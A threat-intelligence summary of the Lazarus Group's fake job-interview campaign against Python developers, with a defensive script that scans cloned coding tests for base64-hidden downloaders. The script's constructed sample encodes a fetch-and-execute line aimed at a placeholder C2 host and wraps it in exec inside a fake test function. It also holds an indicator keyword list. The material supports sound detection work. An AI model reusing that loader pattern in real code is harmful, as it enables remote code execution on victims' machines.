The Lazarus Group [1] [2] [3] [4] [5] [6] [7], a North Korean state-sponsored threat actor [3] [8], has been observed evolving its “fake job” hacking campaign by targeting developers with new malicious software packages on open source repositories.

Description

As part of its VMConnect campaign [1] [4] [5] [6], first identified in August 2023 [6] [7] and believed to still be ongoing [3], the group poses as employees of companies such as Capital One and uses fake job interviews to trick developers into downloading malware [5] [6]. Recently it has targeted Python developers with a fake coding test hosted on GitHub and disguised as a password manager project [3]. Candidates are asked to download and install the password manager as part of the test [3]; doing so executes a hidden downloader that retrieves a second stage [3], allowing the attackers to steal information and potentially deploy backdoors and infostealers [3]. The GitHub projects have been linked to earlier targeted attacks [7], and the group's preferred targets are developers working on cryptocurrency projects, whose access is used to raise funds for the state apparatus and its weapons program [3].

The activity highlights the use of job interviews as an infection vector and the impersonation of reputable organizations [7]. Compromising a developer can have severe consequences, since developers often hold access to sensitive data and production environments [4]. The infection chain aligns with North Korea's typical tactics, techniques, and procedures [4]: previous Lazarus Group operations used malicious PyPI packages, LinkedIn accounts posing as recruiters, and malware delivered via CHM files [1] [4], and the overlapping tradecraft here includes malicious Python packages, encoded downloader functions, and fake job interviews that lure developers into executing malware [4]. A dedicated threat intelligence function that tracks Lazarus Group activity can help detect and mitigate such threats early [4].

This attack is tied to the VMConnect campaign's use of trojanized job-offer documents [8]. A base64-obfuscated malware downloader is hidden in the test files [8]; when run, it connects to a command-and-control (C2) server for further instructions [8]. The practical consequence is that cloning the repository to read it is not the dangerous step; installing the package or running its tests is. Unsolicited coding assignments should be treated as untrusted code: inspect them for long base64-encoded string literals that are decoded and executed before running anything, and run them only in a disposable VM or container with no access to credentials or production systems. The campaign represents a significant evolution in Lazarus Group's strategy, moving beyond traditional targets to developers and potential supply chain attacks [2], and security experts urge developers and organizations to adopt stricter controls to mitigate the risk [2].
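As an added example (not code from any of the cited reports or from the malicious project they describe), the following Python script shows the kind of pre-execution check a reviewer can run over an unsolicited coding test: it parses each source file, flags exec()/eval() calls, and decodes any long base64 string literal to see whether the hidden text contains network or execution code. The indicator keywords, the file names and the constructed sample "test" files are assumptions for illustration; the URL uses the reserved .invalid domain and points at nothing real.

```python
from __future__ import annotations

import ast
import base64
import binascii
import re
from pathlib import Path

# Added example, not code from the cited reports. The indicator tokens below are
# an assumption chosen for illustration: text a downloader stage typically needs.
SUSPICIOUS_TOKENS = ("exec(", "eval(", "urlopen", "requests.", "socket", "subprocess")

# A run of the base64 alphabet at least 40 characters long, optionally padded.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def uses_dynamic_exec(tree: ast.AST) -> bool:
    """True if the module calls exec() or eval() anywhere."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in ("exec", "eval"):
                return True
    return False


def find_base64_literals(tree: ast.AST) -> list[tuple[int, str]]:
    """Collect (line, literal) for string constants that look like base64 blobs."""
    found = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value.strip()
            if BASE64_RE.fullmatch(text):
                found.append((node.lineno, text))
    return found


def try_decode(blob: str) -> str | None:
    """Decode a candidate blob; None if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def scan_source(source: str, name: str = "<source>") -> dict:
    """Scan one Python source text; report decoded blobs that contain indicators."""
    tree = ast.parse(source)
    hits = []
    for lineno, blob in find_base64_literals(tree):
        decoded = try_decode(blob)
        if decoded is None:
            continue
        indicators = [t for t in SUSPICIOUS_TOKENS if t in decoded]
        if indicators:
            hits.append({"file": name, "line": lineno,
                         "indicators": indicators, "preview": decoded[:120]})
    return {"file": name, "dynamic_exec": uses_dynamic_exec(tree), "hits": hits}


def scan_project(root: Path) -> list[dict]:
    """Scan every .py file under root, tests included, since the reports say
    the downloader was hidden in the test files."""
    results = []
    for path in sorted(root.rglob("*.py")):
        try:
            results.append(scan_source(path.read_text(encoding="utf-8"), str(path)))
        except (SyntaxError, UnicodeDecodeError):
            results.append({"file": str(path), "dynamic_exec": None,
                            "hits": [], "error": "unparseable"})
    return results


# Constructed samples standing in for files from a cloned "coding test" repo.
# The second stage fetches and runs code from a C2 URL on the reserved .invalid TLD.
STAGE2_SOURCE = (
    "import urllib.request\n"
    "exec(urllib.request.urlopen('http://c2.invalid/stage2').read())\n"
)
SUSPICIOUS_SAMPLE = (
    "import base64\n"
    "def test_setup():\n"
    f"    exec(base64.b64decode('{base64.b64encode(STAGE2_SOURCE.encode()).decode()}'))\n"
)
BENIGN_SAMPLE = (
    "import base64\n"
    "def test_roundtrip():\n"
    "    assert base64.b64decode(base64.b64encode(b'hello')) == b'hello'\n"
)

if __name__ == "__main__":
    for name, src in (("tests/test_setup.py", SUSPICIOUS_SAMPLE),
                      ("tests/test_roundtrip.py", BENIGN_SAMPLE)):
        report = scan_source(src, name)
        print(report["file"], "dynamic exec:", report["dynamic_exec"])
        for hit in report["hits"]:
            print(f"  line {hit['line']}: {hit['indicators']} -> {hit['preview']!r}")
```

Run scan_project(Path("cloned-repo")) on the checkout before installing or running it. A base64 literal that decodes to code calling urlopen, requests or exec is the pattern described above; a decode failure or a blob with no indicators is merely noise, so the script reports only the former. The check is a heuristic, not proof of safety: a downloader can be split across several strings, use a different encoding, or be fetched from a dependency, which is why the file should still only ever be executed in an isolated environment.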

Conclusion

The recent wave of attacks linked to North Korea's Lazarus Group targets software developers through fraudulent job recruitment schemes as part of the VMConnect campaign [1]. The actors pose as recruiters from financial services firms and distribute malicious Python packages disguised as coding tests to compromise developer systems [1]. Deceptive methods, including fake LinkedIn profiles, are used to trick developers into downloading and executing the malicious code [1]. The sophistication of these tactics highlights the need for increased awareness and stronger security practices among developers [1].

References

[1] https://informationsecuritybuzz.com/lazarus-targets-devs-fake-coding-tests/
[2] https://www.secureworld.io/industry-news/lazarus-developers-coding-test-scam
[3] https://www.techradar.com/pro/security/north-korean-lazarus-hackers-are-using-a-fake-coding-test-to-steal-passwords
[4] https://www.scmagazine.com/news/lazarus-group-tricks-developers-to-load-malware-via-fake-recruiting-tests
[5] https://www.cyclonis.com/developers-targeted-fake-coding-tests-lazarus-group/
[6] https://www.infosecurity-magazine.com/news/lazarus-developers-vmconnect/
[7] https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html
[8] https://fieldeffect.com/blog/lazarus-tricks-job-seeking-developers-with-malware-laced-coding-test